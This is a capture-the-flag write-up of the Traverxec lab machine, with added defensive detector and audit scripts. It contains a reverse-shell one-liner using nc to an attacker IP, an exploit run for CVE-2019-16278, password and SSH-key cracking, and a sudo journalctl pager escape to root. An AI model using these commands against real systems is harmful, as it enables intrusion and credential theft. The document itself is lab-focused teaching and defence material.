Traverxec
Ports scan
u505@kali:~/HTB/Machines/Traverxec$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.165
Starting masscan 1.0.5 at 2020-04-30 14:50:58 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.165
Discovered open port 80/tcp on 10.10.10.165

u505@kali:~/HTB/Machines/Traverxec$ nmap -sC -sV 10.10.10.165
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 10:50 EDT
Nmap scan report for traverxec.htb (10.10.10.165)
Host is up (0.044s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.95 seconds
Web Server
From https://en.wikipedia.org/wiki/Nhttpd
nhttpd is an open-source web server, also known as the Nostromo web server, designed by Marcus Glocker. It runs as a single process, and handles normal concurrent connections by select calls, but for efficiency during more demanding connections such as directory listings and CGI execution it forks. It supports HTTP/1.1 and CGI/1.1, Basic access authentication, SSL, IPv6, custom responses, aliases and virtual hosts. Security measures include running setuid and chrooting. Public access is controlled using the world readable flags and CGI execution by the world executable flags of the file system permissions.
CVE-2019-16278
u505@kali:~/HTB/Machines/Traverxec$ searchsploit nostromo
---------------------------------------- ----------------------------------------
 Exploit Title                          |  Path (/usr/share/exploitdb/)
---------------------------------------- ----------------------------------------
Nostromo - Directory Traversal Remote   | exploits/multiple/remote/47573.rb
nostromo 1.9.6 - Remote Code Execution  | exploits/multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Trav  | exploits/linux/remote/35466.sh
---------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

u505@kali:~/HTB/Machines/Traverxec$ searchsploit -m 47837
  Exploit: nostromo 1.9.6 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47837
     Path: /usr/share/exploitdb/exploits/multiple/remote/47837.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Traverxec/47837.py
We can test the exploit.
u505@kali:~/HTB/Machines/Traverxec$ python 47837.py 10.10.10.165 80 whoami
[exploit banner: CVE-2019-16278 ASCII art]

HTTP/1.1 200 OK
Date: Thu, 30 Apr 2020 15:23:26 GMT
Server: nostromo 1.9.6
Connection: close

www-data
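Seen from the defender's side, a traversal-to-CGI request like the one the exploit sends leaves a recognisable trace in the web server's access log. The detector below is an added example written for this page, not part of the exploit, of nhttpd or of the original write-up. It assumes the server logs requests in Common Log Format (adjust the regex otherwise) and runs over a few constructed sample lines: it percent-decodes the request path, strips control characters the way a lenient parser might, and flags dot-dot segments and references to a shell interpreter.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines in Common Log Format. The third and fourth lines
# are hand-made traversal attempts; none of them is taken from the real box.
SAMPLE_LOG = """\
10.10.14.17 - - [30/Apr/2020:15:23:26 +0000] "GET /index.html HTTP/1.1" 200 1234
10.10.14.17 - - [30/Apr/2020:15:23:27 +0000] "GET /img/portfolio/portfolio_03.jpg HTTP/1.1" 200 8812
10.10.14.17 - - [30/Apr/2020:15:23:28 +0000] "POST /..%2f..%2f..%2fbin/sh HTTP/1.1" 200 0
10.10.14.17 - - [30/Apr/2020:15:23:29 +0000] "GET /.%09./.%09./etc/passwd HTTP/1.1" 404 0
"""

# Assumption: a CLF-like layout. Only ip, path and status are used below.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Interpreters a traversal-to-CGI attack would aim at.
SHELL_BINARIES = ("/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/python")


def normalize_path(raw):
    """Drop the query string and percent-decode twice to defeat double encoding."""
    path = raw.split("?", 1)[0]
    for _ in range(2):
        path = unquote(path)
    return path


def classify_request(path):
    """Return the list of reasons this request path looks like a traversal attempt."""
    reasons = []
    decoded = normalize_path(path)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        reasons.append("control characters in path")
    # A server that strips control characters before path resolution would see this.
    cleaned = "".join(c for c in decoded if ord(c) >= 0x20 and ord(c) != 0x7F)
    if ".." in cleaned.split("/"):
        reasons.append("dot-dot traversal segment")
    if any(cleaned.endswith(b) or (b + "/") in cleaned for b in SHELL_BINARIES):
        reasons.append("shell interpreter referenced")
    return reasons


def scan_log(text):
    """Return (ip, raw path, status, reasons) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m.group("path"))
        if reasons:
            hits.append((m.group("ip"), m.group("path"), m.group("status"), reasons))
    return hits


if __name__ == "__main__":
    for ip, path, status, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {path}: {', '.join(reasons)}")
```

A 200 status on a flagged request (as on the third sample line) is the case worth paging someone about; a 404 still shows that someone is probing.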
Reverse shell
We start the listener.
u505@kali:~/HTB/Machines/Traverxec$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
And we execute the exploit.
u505@kali:~/HTB/Machines/Traverxec$ python 47837.py 10.10.10.165 80 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 4444 >/tmp/f"
[exploit banner: CVE-2019-16278 ASCII art]
The shell appears on our listener.
u505@kali:~/HTB/Machines/Traverxec$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.165.
Ncat: Connection from 10.10.10.165:34512.
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@traverxec:/usr/bin$ uname -a
uname -a
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux
Enumeration
Copy LinEnum and pspy64
u505@kali:~/HTB/Machines/Traverxec$ mkdir www
u505@kali:~/HTB/Machines/Traverxec$ cd www/
u505@kali:~/HTB/Machines/Traverxec/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/Traverxec/www$ cp /opt/utils/pspy/pspy64 ./
Start web server
u505@kali:~/HTB/Machines/Traverxec/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...

From the target, we download the files.
www-data@traverxec:/tmp$ wget -r http://10.10.14.17/
wget -r http://10.10.14.17/
--2020-04-30 11:38:01--  http://10.10.14.17/
Connecting to 10.10.14.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [text/html]
Saving to: '10.10.14.17/index.html'

10.10.14.17/index.h 100%[===================>]     250  --.-KB/s    in 0s

2020-04-30 11:38:01 (29.5 MB/s) - '10.10.14.17/index.html' saved [250/250]

Loading robots.txt; please ignore errors.
--2020-04-30 11:38:01--  http://10.10.14.17/robots.txt
Connecting to 10.10.14.17:80... connected.
HTTP request sent, awaiting response... 404 File not found
2020-04-30 11:38:01 ERROR 404: File not found.

--2020-04-30 11:38:01--  http://10.10.14.17/LinEnum.sh
Connecting to 10.10.14.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: '10.10.14.17/LinEnum.sh'

10.10.14.17/LinEnum 100%[===================>]  45.54K  --.-KB/s    in 0.09s

2020-04-30 11:38:01 (526 KB/s) - '10.10.14.17/LinEnum.sh' saved [46631/46631]

--2020-04-30 11:38:01--  http://10.10.14.17/pspy64
Connecting to 10.10.14.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: '10.10.14.17/pspy64'

10.10.14.17/pspy64  100%[===================>]   2.94M  3.91MB/s    in 0.8s

2020-04-30 11:38:02 (3.91 MB/s) - '10.10.14.17/pspy64' saved [3078592/3078592]

FINISHED --2020-04-30 11:38:02--
Total wall clock time: 1.2s
Downloaded: 3 files, 3.0M in 0.8s (3.56 MB/s)
We make the files executable.

www-data@traverxec:/tmp$ cd 10.10.14.17
cd 10.10.14.17
www-data@traverxec:/tmp/10.10.14.17$ chmod +x LinEnum.sh pspy64
chmod +x LinEnum.sh pspy64

We run the enumeration.

www-data@traverxec:/tmp/10.10.14.17$ ./LinEnum.sh
...
[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
The enumeration finds an htpasswd file.
Crack the htpasswd file
u505@kali:~/HTB/Machines/Traverxec$ cat hash
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
u505@kali:~/HTB/Machines/Traverxec$ hashcat -m 500 hash --session traverxec --username /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
...
u505@kali:~/HTB/Machines/Traverxec$ hashcat -m 500 hash --session traverxec --username /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me
I tried to ssh with this password, but I was unsuccessful.
User folder
With the htpasswd file in mind, we check the nostromo configuration file.
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
cat nhttpd.conf
# MAIN [MANDATORY]

servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html

# LOGS [OPTIONAL]

logpid logs/nhttpd.pid

# SETUID [RECOMMENDED]

user www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs /home
homedirs_public public_www
This shows that user home directories are served over the web (homedirs /home, with public_www as the public folder), and the user david has one.

u505@kali:~/HTB/Machines/Traverxec$ curl http://traverxec.htb/~david/
<html>
<head>
<style>
html {
  font-family: sans-serif;
  color: rgb(128,96,0);
  background: url(/img/portfolio/portfolio_03.jpg) no-repeat center center fixed;
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
}
</style>
</head><body><font style="sans-serif"><h1>Private space.<br>Nothing here.<br>Keep out!</h1></body></html>

The page itself shows nothing, but since the nostromo server runs as www-data, that user should be able to read the public_www folder inside david's home directory.
www-data@traverxec:/usr/bin$ ls -l /home/david/public_www
ls -l /home/david/public_www
total 8
-rw-r--r-- 1 david david  402 Oct 25  2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25  2019 protected-file-area
www-data@traverxec:/usr/bin$ ls -l /home/david/public_www/protected-file-area
ls -l /home/david/public_www/protected-file-area
total 4
-rw-r--r-- 1 david david 1915 Oct 25  2019 backup-ssh-identity-files.tgz
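Two findings from the last sections, the md5-crypt hash in .htpasswd and the homedirs settings that expose everything under /home/&lt;user&gt;/public_www to the web server user and to the web, can both be spotted from the configuration alone. The audit below is an added example, not part of nhttpd or of the original write-up. It parses copies of the nhttpd.conf and .htpasswd shown above (embedded as constructed input) and assumes that nhttpd validates passwords against crypt(3)-style hashes, which the $1$ prefix indicates.

```python
# Constructed input: copies of the nhttpd.conf and .htpasswd found on the box
# (the hash is the one recovered in the write-up).
NHTTPD_CONF = """\
# MAIN [MANDATORY]
servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html

# SETUID [RECOMMENDED]
user www-data

# BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd

# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www
"""

HTPASSWD = "david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/\n"

# crypt(3) prefixes and how they hold up against offline cracking with hashcat.
# Assumption: nhttpd defers to the system crypt(3), as the $1$ hash suggests.
HASH_SCHEMES = {
    "$1$": ("md5-crypt", "weak"),
    "$apr1$": ("apr1 (Apache MD5)", "weak"),
    "$5$": ("sha256-crypt", "acceptable"),
    "$6$": ("sha512-crypt", "acceptable"),
    "$2a$": ("bcrypt", "strong"),
    "$2b$": ("bcrypt", "strong"),
    "$2y$": ("bcrypt", "strong"),
}


def parse_nhttpd_conf(text):
    """nhttpd.conf is one 'key value' pair per line; '#' starts a comment."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        conf[key] = value.strip()
    return conf


def classify_hash(hashed):
    """Map a crypt(3) hash to (scheme name, strength rating)."""
    for prefix, info in HASH_SCHEMES.items():
        if hashed.startswith(prefix):
            return info
    if len(hashed) == 13:  # traditional DES crypt: 2-char salt + 11 chars
        return ("des-crypt", "weak")
    return ("unknown", "review")


def audit_htpasswd(text):
    """Return (user, scheme, rating) for every entry in an htpasswd file."""
    results = []
    for line in text.splitlines():
        if ":" not in line:
            continue
        user, hashed = line.split(":", 1)
        scheme, rating = classify_hash(hashed.strip())
        results.append((user.strip(), scheme, rating))
    return results


def audit_config(conf):
    """Flag settings that widen the attack surface, as they did on this box."""
    findings = []
    if "homedirs" in conf:
        public = conf.get("homedirs_public", "<homedirs_public unset>")
        findings.append(
            f"homedirs enabled: /~<user>/ serves {conf['homedirs']}/<user>/{public}, "
            "so anything placed there is reachable over HTTP and readable by the server user"
        )
    if conf.get("user", "root") == "root":
        findings.append("no unprivileged 'user' set: nhttpd keeps root privileges")
    return findings


if __name__ == "__main__":
    conf = parse_nhttpd_conf(NHTTPD_CONF)
    for user, scheme, rating in audit_htpasswd(HTPASSWD):
        print(f"{user}: {scheme} ({rating})")
    for finding in audit_config(conf):
        print(finding)
```

On this box the htpasswd entry rates "weak" (md5-crypt falls to a wordlist in seconds, as the hashcat run showed) and the homedirs finding is exactly the path that led to the backup archive.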
We copy the backup file.
www-data@traverxec:/tmp$ cp /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz ./
And extract it.
www-data@traverxec:/tmp$ tar xvfz backup-ssh-identity-files.tgz
tar xvfz backup-ssh-identity-files.tgz
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
www-data@traverxec:/tmp$ cat home/david/.ssh/id_rsa
cat home/david/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F
seyeH/feG19TlUaMdvHZK/2qfy8pwwdr9sg75x4hPpJJ8YauhWorCN4LPJV+wfCG tuiBPfZy+ZPklLkOneIggoruLkVGW4k4651pwekZnjsT8IMM3jndLNSRkjxCTX3W KzW9VFPujSQZnHM9Jho6J8O8LTzl+s6GjPpFxjo2Ar2nPwjofdQejPBeO7kXwDFU RJUpcsAtpHAbXaJI9LFyX8IhQ8frTOOLuBMmuSEwhz9KVjw2kiLBLyKS+sUT9/V7 HHVHW47Y/EVFgrEXKu0OP8rFtYULQ+7k7nfb7fHIgKJ/6QYZe69r0AXEOtv44zIc Y1OMGryQp5CVztcCHLyS/9GsRB0d0TtlqY2LXk+1nuYPyyZJhyngE7bP9jsp+hec dTRqVqTnP7zI8GyKTV+KNgA0m7UWQNS+JgqvSQ9YDjZIwFlA8jxJP9HsuWWXT0ZN 6pmYZc/rNkCEl2l/oJbaJB3jP/1GWzo/q5JXA6jjyrd9xZDN5bX2E2gzdcCPd5qO xwzna6js2kMdCxIRNVErnvSGBIBS0s/OnXpHnJTjMrkqgrPWCeLAf0xEPTgktqi1 Q2IMJqhW9LkUs48s+z72eAhl8naEfgn+fbQm5MMZ/x6BCuxSNWAFqnuj4RALjdn6 i27gesRkxxnSMZ5DmQXMrrIBuuLJ6gHgjruaCpdh5HuEHEfUFqnbJobJA3Nev54T fzeAtR8rVJHlCuo5jmu6hitqGsjyHFJ/hSFYtbO5CmZR0hMWl1zVQ3CbNhjeIwFA bzgSzzJdKYbGD9tyfK3z3RckVhgVDgEMFRB5HqC+yHDyRb+U5ka3LclgT1rO+2so uDi6fXyvABX+e4E4lwJZoBtHk/NqMvDTeb9tdNOkVbTdFc2kWtz98VF9yoN82u8I Ak/KOnp7lzHnR07dvdD61RzHkm37rvTYrUexaHJ458dHT36rfUxafe81v6l6RM8s 9CBrEp+LKAA2JrK5P20BrqFuPfWXvFtROLYepG9eHNFeN4uMsuT/55lbfn5S41/U rGw0txYInVmeLR0RJO37b3/haSIrycak8LZzFSPUNuwqFcbxR8QJFqqLxhaMztua 4mOqrAeGFPP8DSgY3TCloRM0Hi/MzHPUIctxHV2RbYO/6TDHfz+Z26ntXPzuAgRU /8Gzgw56EyHDaTgNtqYadXruYJ1iNDyArEAu+KvVZhYlYjhSLFfo2yRdOuGBm9AX JPNeaxw0DX8UwGbAQyU0k49ePBFeEgQh9NEcYegCoHluaqpafxYx2c5MpY1nRg8+ XBzbLF9pcMxZiAWrs4bWUqAodXfEU6FZv7dsatTa9lwH04aj/5qxEbJuwuAuW5Lh hORAZvbHuIxCzneqqRjS4tNRm0kF9uI5WkfK1eLMO3gXtVffO6vDD3mcTNL1pQuf SP0GqvQ1diBixPMx+YkiimRggUwcGnd3lRBBQ2MNwWt59Rri3Z4Ai0pfb1K7TvOM j1aQ4bQmVX8uBoqbPvW0/oQjkbCvfR4Xv6Q+cba/FnGNZxhHR8jcH80VaNS469tt VeYniFU/TGnRKDYLQH2x0ni1tBf0wKOLERY0CbGDcquzRoWjAmTN/PV2VbEKKD/w -----END RSA PRIVATE KEY-----
We try to ssh with the key, using the password cracked from htpasswd as the passphrase.

u505@kali:~/HTB/Machines/Traverxec$ vi rsa_david
u505@kali:~/HTB/Machines/Traverxec$ chmod 600 rsa_david
u505@kali:~/HTB/Machines/Traverxec$ ssh -i rsa_david david@10.10.10.165
Enter passphrase for key 'rsa_david':
Enter passphrase for key 'rsa_david':
Enter passphrase for key 'rsa_david':
david@10.10.10.165's password:
Permission denied, please try again.
david@10.10.10.165's password:
But it fails.
Alternative way to obtain the ssh key file
The folder protected-file-area can also be reached over the web, authenticating as david with the password cracked earlier, but we only learned of the folder through an ls, so copying the file directly from the command line was easier.
User flag
With the ssh key, we should be able to ssh as david, but we need to brute force the passphrase of the key file.
Crack the passphrase of the key file
u505@kali:~/HTB/Machines/Traverxec$ /usr/share/john/ssh2john.py rsa_david >rsa_david.hash
u505@kali:~/HTB/Machines/Traverxec$ john rsa_david.hash -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (rsa_david)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:02 DONE (2020-04-30 14:32) 0.3984g/s 5713Kp/s 5713Kc/s 5713KC/s *7¡Vamos!
Session completed
User Flag
u505@kali:~/HTB/Machines/Traverxec$ ssh -i rsa_david david@10.10.10.165
Enter passphrase for key 'rsa_david':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$ cat user.txt
<USER_FLAG>
Escalation of privileges
A simple ls shows a bin folder.
david@traverxec:~$ ls -ltr
total 12
drwxr-xr-x 3 david david 4096 Oct 25 2019 public_www
-r--r----- 1 root david 33 Oct 25 2019 user.txt
drwx------ 2 david david 4096 Oct 25 2019 bin
david@traverxec:~$ cd bin
david@traverxec:~/bin$ ls -l
total 8
-r-------- 1 david david 802 Oct 25 2019 server-stats.head
-rwx------ 1 david david 363 Oct 25 2019 server-stats.sh
david@traverxec:~/bin$ cat server-stats.head
.----.
.---------. | == |
Webserver Statistics and Data |.-"""""-.| |----|
Collection Script || || | == |
(c) David, 2019 || || |----|
|'-.....-'| |::::|
'"")---(""' |___.|
/:::::::::::\" "
/:::=======:::\
jgs '"""""""""""""'
The shell script runs journalctl through sudo.

david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
Searching GTFOBins, we find that journalctl can be used to spawn a shell: when its output goes to a terminal it hands it to less, and less can run a shell with the ! command. The script pipes the output through cat, which disables the pager, but nothing stops us from running the same sudo command without the pipe.

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Thu 2020-04-30 10:53:32 EDT, end at Thu 2020-04-30 14:51:34 EDT. --
Apr 30 12:05:55 traverxec sudo[1807]: pam_unix(sudo:auth): authentication failure; logname= u
Apr 30 12:05:57 traverxec sudo[1807]: pam_unix(sudo:auth): conversation failed
Apr 30 12:05:57 traverxec sudo[1807]: pam_unix(sudo:auth): auth could not identify password f
Apr 30 12:05:57 traverxec sudo[1807]: www-data : command not allowed ; TTY=pts/0 ; PWD=/tmp/1
Apr 30 12:05:57 traverxec crontab[1868]: (www-data) LIST (www-data)
!whoami
root
!done  (press RETURN)
!/bin/bash
root@traverxec:/home/david/bin# cat /root/root.txt
<ROOT_FLAG>
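The escalation works because the sudo rule grants journalctl without constraining its pager. The checker below is an added example and not part of the box, of sudo or of the original write-up. The sudoers fragment it reads is constructed: the write-up shows the command david can run but not the rule that grants it, so the first rule is an assumption about that grant, and the second rule is the same grant hardened with --no-pager in the command spec (sudo matches arguments exactly, so the user cannot drop it) plus the NOEXEC tag, which stops a pager from executing a shell even if one is reached.

```python
import re

# Constructed sudoers fragment (assumption: line 2 is the rule that gave david
# the command seen in server-stats.sh; line 3 is the hardened form of it).
SUDOERS = """\
Defaults env_reset
david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
ops   ALL=(root) NOEXEC: NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
"""

# Binaries that hand the terminal to a pager or editor, from which a shell can
# be started with "!" (the GTFOBins trick used above). Not exhaustive.
PAGER_COMMANDS = {
    "/usr/bin/journalctl", "/usr/bin/systemctl", "/usr/bin/git",
    "/usr/bin/man", "/usr/bin/less", "/usr/bin/more",
}

# user host=(runas) TAG: TAG: command args
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmd>\S.*)$"
)


def parse_rule(line):
    """Parse one user specification; return None for lines that are not rules."""
    m = RULE_RE.match(line)
    if not m:
        return None
    tags = set(re.findall(r"([A-Z]+):", m.group("tags")))
    argv = m.group("cmd").split()
    return {"who": m.group("who"), "runas": m.group("runas") or "root",
            "tags": tags, "argv": argv}


def audit_sudoers(text):
    """Return one finding per rule through which a pager-capable command could escape."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        rule = parse_rule(line)
        if rule is None:
            continue
        binary, args = rule["argv"][0], rule["argv"][1:]
        reasons = []
        if binary in PAGER_COMMANDS and "NOEXEC" not in rule["tags"]:
            reasons.append("pager-capable command without NOEXEC")
        if binary.endswith("/journalctl") and "--no-pager" not in args:
            reasons.append("journalctl without --no-pager")
        if reasons:
            findings.append({"who": rule["who"], "runas": rule["runas"],
                             "binary": binary, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SUDOERS):
        print(f"{f['who']} -> {f['binary']} as {f['runas']}: {'; '.join(f['reasons'])}")
```

Only the david rule is reported; the ops rule passes both checks. With env_reset in place the user also cannot smuggle in a SYSTEMD_PAGER setting, so --no-pager plus NOEXEC closes this particular path while keeping the log view the script needs.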
Daniel Simao 16:14, 30 April 2020 (EDT)